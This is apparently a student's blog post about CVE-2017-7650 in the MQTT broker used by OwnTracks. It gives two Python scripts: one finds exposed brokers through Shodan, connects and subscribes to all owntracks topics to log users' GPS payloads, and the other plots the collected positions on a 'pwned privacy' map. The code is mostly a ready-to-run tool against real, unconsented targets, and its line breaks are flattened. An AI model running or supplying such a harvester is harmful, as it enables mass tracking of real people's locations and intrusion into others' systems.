Previously I was working on university minor project (IPS system for IoT devices). So, I have picked up CVE-2017-7650 to define snort rule for it. I was thinking how someone can leverage this silly vulnerability and I asked my self in current IoT space what kind of data can compromise user’s privacy. Yes, it is GPS data. I am big fan of Python programming and wanted to use it’s power, so I wrote to small python scripts which gathers list of IP addresses from Shodan API, tries to connect on those IPs as MQTT client. If connection is established successfully(this happens because no ACL is present on those IPs), script will try to subscribe all owntracks topics with help of CVE-2017-7650 and stores GPS data in .json file later utilised by second script which tries to map out those GPS points.
import paho.mqtt.client as mqtt import shodan import time import os, sys, socket #Some house cleaning if sys.platform != "win32": os.system('clear') else: os.system('cls') #Shodan API config SHODAN_API_KEY = "" #Sign up for new account at https://www.shodan.io and Put your shodan API key here(if you are university student please register with your university mail id to get fully featured account for free) shodan_api = shodan.Shodan(SHODAN_API_KEY) results = shodan_api.search("owntracks port:1883") def on_connect(client, userdata, flags, rc): print("[+] Connection successful") client.subscribe('owntracks/#', qos = 1) # Subscribe to all topics def on_message(client, userdata, msg): if msg.payload != "": print ('[+] Topic: %s \n[+] Message: %s \n' % (msg.topic, msg.payload)) f = open('CVE-2017-7650_owntracks_geodata.json', 'a+') f.write("%s\n" % (msg.payload)) f.close() else: print('Device is not vulnerable') client = mqtt.Client(client_id = "MqttClient") client.on_connect = on_connect client.on_message = on_message for result in results['matches']: ip_addr = result['ip_str'] f = open('CVE-2017-7650_owntracks_geodata.json', 'a') print('[+] Data recieved from: ' + ip_addr + '\n\n\n') f.close() try: client.connect(ip_addr, 1883, 60) except socket.error, e: print('[+] Error could not connect to ' + ip_addr) continue client.loop_start() time.sleep(6) client.loop_stop() client.disconnect() # Author: CJHackerz
import folium import json from time import sleep geo_map = folium.Map(location=[0, 0], zoom_start=3 ) with open('CVE-2017-7650_owntracks_geodata.json', 'r') as json_file: #Iterating through json objects in each new line for data in json_file: geo_data = json.loads(data) #To avoid encrypted data and json objects which does not have lat and lon attributes try: folium.Marker([geo_data['lat'], geo_data['lon']]).add_to(geo_map) except KeyError: continue geo_map.save('pwned_privacy_map.html')